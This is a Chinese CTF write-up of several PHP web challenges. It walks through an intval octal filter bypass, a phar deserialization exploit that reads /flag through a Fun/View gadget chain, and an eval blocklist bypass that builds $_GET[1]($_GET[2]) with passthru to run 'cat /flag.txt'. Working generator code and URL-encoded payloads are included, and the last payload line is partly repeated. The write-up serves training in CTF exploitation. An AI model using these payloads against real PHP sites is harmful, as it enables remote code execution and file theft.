热身
<?php
/*
 * # -*- coding: utf-8 -*-
 * # @Author: h1xa
 * # @Date: 2020-09-16 11:25:09
 * # @Last Modified by: h1xa
 * # @Last Modified time: 2020-09-18 16:53:59
 * # @link: https://ctfer.com
 *
 * Challenge "热身" (warm-up): the flag is printed only when intval($num, 0)
 * evaluates to 4476, while three filters reject the obvious spellings of 4476.
 */
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    // Filter 1: loose comparison against an int. Numeric strings such as
    // "4476" or "4476.0" compare == 4476, so the decimal spelling is out.
    // "010574" is a decimal 10574 for ==, so it gets past this check.
    if($num==4476){
        die("no no no!");
    }
    // Filter 2: no letters (case-insensitive) and no '.', which rules out the
    // hex form ("0x117c"), exponent forms ("4.476e3") and any float form.
    if(preg_match("/[a-z]|\./i", $num)){
        die("no no no!!");
    }
    // Filter 3: strpos() returns an offset and 0 is falsy, so a "0" at
    // position 0 (a bare octal literal like "010574") is rejected exactly
    // like a string with no "0" at all. The "0" must sit at offset >= 1.
    if(!strpos($num, "0")){
        die("no no no!!!");
    }
    // intval() with base 0 auto-detects the radix from the string (see the
    // manual excerpt below): a leading "0" means octal, and 010574 (octal)
    // is 4476. The "+010574" payload works because the radix detection
    // skips the leading sign/whitespace, which also moves the "0" to offset 1.
    if(intval($num,0)===4476){
        echo $flag;
    }
}
查官方文档
intval() 函数用于获取变量的整数值。 intval() 函数通过使用指定的进制 base 转换(默认是十进制),返回变量 var 的 integer 数值。 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1。 PHP 4, PHP 5, PHP 7 语法 int intval ( mixed $var [, int $base = 10 ] ) 参数说明: $var:要转换成 integer 的数量值。 $base:转化所使用的进制。 如果 base 是 0,通过检测 var 的格式来决定使用的进制: 如果字符串包括了 "0x" (或 "0X") 的前缀,使用 16 进制 (hex);否则, 如果字符串以 "0" 开始,使用 8 进制(octal);否则, 将使用 10 进制 (decimal)。
?num=+010574（URL 中的 `+` 会被解码为空格；intval($num,0) 在检测进制前先跳过前导空白/正负号，所以 " 010574" 仍按八进制解析为 4476；同时 strpos 找到的 "0" 偏移变为 1（真值），而 " 010574"==4476 按十进制 10574 比较不成立，三个过滤全部绕过。）
ATTup
查看前端源码查到php文件
upload.php find.php
任意文件读取漏洞,读取find.php
<!--class View {
    public $fn;
    // Callable-object gadget: invoking a View reads whatever path is stored in
    // $fn (no validation at all) and leaks it base64-encoded inside an alert().
    // This is the arbitrary file read the writeup uses.
    public function __invoke(){
        $text = base64_encode(file_get_contents($this->fn));
        echo "<script>alert('".$text."');self.location=document.referrer;</script>";
    }
}
class Fun{
    public $fun = ":)";
    // String-conversion gadget: $this->fun is called as a function. When $fun
    // holds a View object, this is what fires View::__invoke().
    public function __toString(){
        $fuc = $this->fun;
        $fuc();
        return "<script>alert('Be a happy string~');self.location=document.referrer;</script>";
    }
    // Entry gadget: concatenating $this->fun into a string triggers the
    // __toString() of whatever object was stored there (a second Fun).
    public function __destruct() {
        echo "<script>alert('Just a fun ".$this->fun."');self.location=document.referrer;</script>";
    }
}
// Sink: a user-controlled path reaches stat(). stat() honours stream wrappers,
// so a phar:// path makes PHP parse the archive and unserialize its metadata,
// which is where the Fun/View chain above gets instantiated.
$filename = $_POST["file"];
$stat = @stat($filename);-->
代码审计
stat
stat (PHP 4, PHP 5, PHP 7, PHP 8) stat — 给出文件的信息。这里可以触发 phar 反序列化：stat() 等文件系统函数支持流封装协议，传入 phar:// 路径时 PHP 会解析 phar 的 manifest 并对其中的 meta-data 调用 unserialize()，因此 $_POST["file"] 可控加上能上传文件，就能触发上面 Fun/View 的链。
phar反序列化
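<?php
/*
 * Phar generator for the find.php gadget chain (stat() -> phar:// -> metadata
 * unserialize()). The class bodies mirror the leaked find.php with their
 * output side effects commented out: unserialize() on the target rebuilds the
 * objects from class/property names only, so the method bodies here are
 * irrelevant, and keeping them inert also stops the chain from firing locally
 * when $a is destroyed at the end of this script.
 */
class View {
    public $fn;
    public function __invoke(){
        // $text = base64_encode(file_get_contents($this->fn));
        // echo "<script>alert('".$text."');self.location=document.referrer;</script>";
    }
}
class Fun{
    public $fun = ":)";
    public function __toString(){
        $fuc = $this->fun;
        $fuc(); // on the target: View::__invoke() -> file read
        return "1";
        // return "<script>alert('Be a happy string~');self.location=document.referrer;</script>";
    }
    public function __destruct() {
        // echo "<script>alert('Just a fun ".$this->fun."');self.location=document.referrer;</script>";
    }
}

// Chain: Fun::__destruct -> (string)$this->fun -> Fun::__toString -> View::__invoke
$a=new Fun();
$a->fun=new Fun();
$a->fun->fun=new View();
$a->fun->fun->fn="/flag"; // path the target will read

// Start from a clean archive. The original removed "phar.phar" but wrote
// "c2.phar", so a stale c2.phar from an earlier run would be reopened and
// amended rather than rebuilt.
@unlink("c2.phar");
// NOTE: creating a phar requires phar.readonly=0 (e.g. php -d phar.readonly=0).
$phar = new Phar("c2.phar");
$phar->startBuffering();
// Stub: GIF magic so an upload filter sees an image, and no "<?php" because
// the upload filter reportedly rejects it; the phar parser only needs the
// __HALT_COMPILER(); marker.
$phar->setStub('GIF89a'.' __HALT_COMPILER();'); // set the stub
$phar->setMetadata($a); // store the gadget object as manifest meta-data
$phar->addFromString("test.txt", "test"); // add one file so the archive is valid
// signature is computed automatically
$phar->stopBuffering();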
直接修改后缀为tar
`$phar->setStub` 这一行的内容不能出现 `<?` 与 `php`，否则上传时会提示内容非法。stub 的基本结构：stub 必须以 `__HALT_COMPILER();` 作为结束部分，否则 Phar 扩展将不会识别该文件（Phar 解析器只查找这个标记，并不要求 `<?php` 开头，所以这里用 `GIF89a __HALT_COMPILER();` 即可同时满足图片魔数和上传过滤）。
然后以phar://c2.tar协议访问即可
alert('Y3Rmc2hvd3szOWFmNDIzMi04MTQ2LTRiMzQtOGUwZS1lYmFiMGExZjY5N2R9Cg=='); 解码得到flag
shellme
直接搜索flag得到flag,非预期解?
shellme_Revenge
尝试搜索ctfhsow,flag,ctf,hint等关键词,查看cookie等信息
Set-Cookie hint=%3Flooklook; expires=Sat, 20-May-2023 04:56:12 GMT; Max-Age=3600 PHP Version 7.2.34
?looklook=1
<?php
// shellme_Revenge: the source is shown via ?looklook=1 (the hint cookie points here).
error_reporting(0);
if ($_GET['looklook']){
    highlight_file(__FILE__);
}else{
    setcookie("hint", "?looklook", time()+3600);
}
if (isset($_POST['ctf_show'])) {
    $ctfshow = $_POST['ctf_show'];
    // Intended as "a string AND at most 107 bytes", but written with ||:
    // any string short-circuits the length check, so there is no length limit.
    if (is_string($ctfshow) || strlen($ctfshow) <= 107) {
        // Blocklist, not allowlist. Rejected: every letter except 'C', digits
        // 4-9, quotes, backtick, backslash, and ! @ # % ^ & * : | ~.
        // Still allowed: space $ ( ) + , - . / 0 1 2 3 ; < = > ? C [ ] _ { } —
        // enough for the string-increment trick ("C"++ === "D") and $$var access.
        if (!preg_match("/[!@#%^&*:'\"|`a-zA-BD-Z~\\\\]|[4-9]/",$ctfshow)){
            eval($ctfshow); // RCE sink
        }else{
            echo("fucccc hacker!!");
        }
    }
} else {
    phpinfo();
}
?>
生成ascii对应可见字符
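# Write one candidate character per line (codes 31..127) so the PHP helper can
# replay each one through the challenge's preg_match() blocklist.
# f.write() is the right call for a single string; the original used
# f.writelines(), which only produced the same bytes by accident (it iterates
# the str character by character and writes each one).
# NOTE: 31 (US) and 127 (DEL) are not visible characters; range(32, 127) would
# be the strictly printable set. Kept as-is to match the listed results.
with open("ascii.txt", "w") as f:
    for i in range(31, 128):
        f.write(chr(i) + "\n")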
查看通过正则的内容
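<?php
// Replay every candidate character from ascii.txt (one per line, written by
// the Python helper) through the exact checks shellme_Revenge applies to
// $_POST['ctf_show'], and print the ones that would reach eval().
$myfile = fopen("ascii.txt", "r") or die("Unable to open file!");
// Loop on fgets() itself rather than feof(): with the feof() pattern the last
// iteration gets false from fgets() (EOF already hit) and feeds a non-string
// into strlen()/preg_match().
while (($ctfshow = fgets($myfile)) !== false) {
    // Same (buggy) || as the target: any string passes regardless of length.
    if (is_string($ctfshow) || strlen($ctfshow) <= 107) {
        if (!preg_match("/[!@#%^&*:'\"|`a-zA-BD-Z~\\\\]|[4-9]/", $ctfshow)) {
            echo "$ctfshow"; // the line still carries its "\n" from fgets()
        }
    }
}
fclose($myfile);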
第一行是空格
空格 $ ( ) + , - . / 0 1 2 3 ; < = > ? C [ ] _ { }（`>` 同样不在黑名单中，原文列表缺少它，疑为 HTML 渲染时被吞掉）
这里尝试通过++和c构造任意字符执行命令
在 PHP 中，如果强制连接数组和字符串，数组会被转换成字符串 `Array`（常用来取得字母 A/r/y）。不过下面的 payload 并没有用数组，而是用 `C/C`：两个非数字字符串相除在 PHP 7 中按 `0/0` 处理，只产生警告并得到 NAN，再拼接上 `C` 得到 `NANC`，取 `[0]` 即为字符 `N`，随后用 ++ 依次得到 O、P、Q、R、S、T。
<?php
// Payload for eval() under the shellme_Revenge blocklist. Only one letter,
// 'C', is allowed, so every other letter is produced with PHP's string
// increment ("C"++ === "D"), and the rest is built from $ _ . ( ) [ ] ; .
// NOTE: relies on PHP 7 semantics (target is 7.2.34): a bare `C` is an
// undefined constant that degrades to the string "C" with a warning, and
// C/C is 0/0 => NAN with a warning. Under PHP 8 both throw, so this breaks.
$_=C;               // "C" (undefined constant -> string in PHP 7)
$_++;               //D
$C=++$_;            //E
$_++;               //F
$C_=++$_;           //G
$_=(C/C.C)[0];      //N  ("C"/"C" -> NAN, "NAN"."C" -> "NANC", [0] -> "N")
$_++;               //O
$_++;               //P
$_++;               //Q
$_++;               //R
$_++;               //S
$_=_.$C_.$C.++$_;   //_GET  ("_"."G"."E"."T")
$$_[1]($$_[2]);     //$_GET[1]($_GET[2])  e.g. ?1=passthru&2=cat /flag.txt
?>
ctf_show=$_=C;$_++;$C=++$_;$_++;$C_=++$_;$_=(C/C.C)[0];$_++;$_++;$_++;$_++;$_++;$_=_.$C_.$C.++$_;$$_[1]($$_[2]);
ctf_show=%24%5f%3d%43%3b%24%5f%2b%2b%3b%24%43%3d%2b%2b%24%5f%3b%24%5f%2b%2b%3b%24%43%5f%3d%2b%2b%24%5f%3b%24%5f%3d%28%43%2f%43%2e%43%29%5b%30%5d%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%3d%5f%2e%24%43%5f%2e%24%43%2e%2b%2b%24%5f%3b%24%24%5f%5b%31%5d%28%24%24%5f%5b%32%5d%29%3b
?1=passthru&2=cat /flag.txt ctf_show=%24%5f%3d%43%3b%24%5f%2b%2b%3b%24%43%3d%2b%2b%24%5f%3b%24%5f%2b%2b%3b%24%43%5f%3d%2b%2b%24%5f%3b%24%5f%3d%28%43%2f%43%2e%43%29%5b%30%5d%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%3d%5f%2e%24%43%5f%2e%24%43%2e%2b%2b%24%5f%3b%24%24%5f%5b%31%5d%28%24%24%5f%5b%32%5d%29%3b %3b%24%43%3d%2b%2b%24%5f%3b%24%5f%2b%2b%3b%24%43%5f%3d%2b%2b%24%5f%3b%24%5f%3d%28%43%2f%43%2e%43%29%5b%30%5d%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%2b%2b%3b%24%5f%3d%5f%2e%24%43%5f%2e%24%43%2e%2b%2b%24%5f%3b%24%24%5f%5b%31%5d%28%24%24%5f%5b%32%5d%29%3b